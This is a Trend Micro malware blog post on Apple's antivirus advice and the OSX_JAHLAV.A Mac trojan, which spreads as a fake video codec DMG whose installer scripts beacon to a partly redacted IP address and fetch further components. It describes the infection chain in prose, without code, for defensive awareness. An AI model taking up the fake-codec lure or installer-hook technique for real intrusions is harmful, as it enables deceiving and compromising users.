Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
  • Email Subscription

  • About Us

    Apple’s suggestion to Mac users to install antivirus programs on their systems has been creating buzz in the online community. This is despite the fact that Apple initially pushed the same notion six years ago, and also echoed the same concern last year.

    The matter surprised those who’ve heard of such news just recently, especially since Apple claims in their advertisements that Mac users should not worry about malicious software. Some users dismissed the announcement as admittance by Apple that Mac is also susceptible to malware attacks. The issue grew further after the antivirus suggestion post was deleted from the Apple website.

    Though Apple’s motives for their actions are still unclear, one thing certain though is everyone’s need for protection from threats. As Advanced Trend Micro Threats Researcher Jamz Yaneza puts it,

    The reality is that any growing market segment is a target for criminals and boy can they pick ’em. Apple Mac’s are expensive and having one puts users in a certain cash-plenty demographic ripe for spear phishing.

    Yaneza further states that the existence of Mac-related threats isn’t surprising at all. He says

    Threats on the Apple Mac [are] nothing new. Do not be deceived, [it’s] just another example of the old becoming new again

    Ironically, had they not retracted their previous statement, Apple’s concern for the security of their users’ systems would have come in perfect timing with a recent reported web threat that targets Mac users. The malware, detected as OSX_JAHLAV.A is reported to come from spammed messages, and is also said to be distributed through websites by posing as an application. Links on the spammed message lead to a site which supposedly contains a video that the user must watch.

    Upon trying to play the video however, the user is greeted with a dialog box asking them to download a “codec” to be able to view the video. Once the user chooses to download the alleged codec, the file cold-live7000.dmg is instead downloaded into the affected system. DMG files such as cold-live7000.dmg are Disk Image Files, quite similar to ISO files. Such files are copies of an entire disk placed into a single file, and require special mounting software to be able to extract the data.

    In this case, cold-live7000.dmg was found to contain the installer package file named install.pkg.

    Figure 1. Contents of disk image file

    This installer package file contains the shell script files preinstall and preupgrade. These two files basically have the same content and Trend Micro detects them both as UNIX_JAHLAV.A. UNIX_JAHLAV.A is a shell script malware designed to run in Mac OS X that causes the system to connect to a certain IP address every five hours.

    Figure 2. Script files preinstall and preupgrade

    Executing install.pkg will display the following window:

    Figure 3. Install prompt displayed when executing the installer package

    The installer name MacAccess is apparently just one of the names this threat goes by. Its reported previous names are MacVideo and Porn4Mac.

    Figure 4. Malwaer installation taking place

    During installation, it tries to connect via HTTP to the IP address {BLOCKED}.{BLOCKED}.60.106 to download and execute its additional component. Unfortunately, the IP address is inaccessible as of this writing.

    Windows may be more targeted that Mac, but users must realize that regardless of the operating system being used, every system connected to the Internet is bound to encounter a certain kind of threat, thus calling the need for security measures.

    Here are some of the recent Mac-related threats we’ve seen:

  • Rogue App Sweeps Mac
  • Scareware software makes its second round on Mac O/S
  • Backdoor Busts the Mac Myth
  • New Malware Threatens Mac Users

  • Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice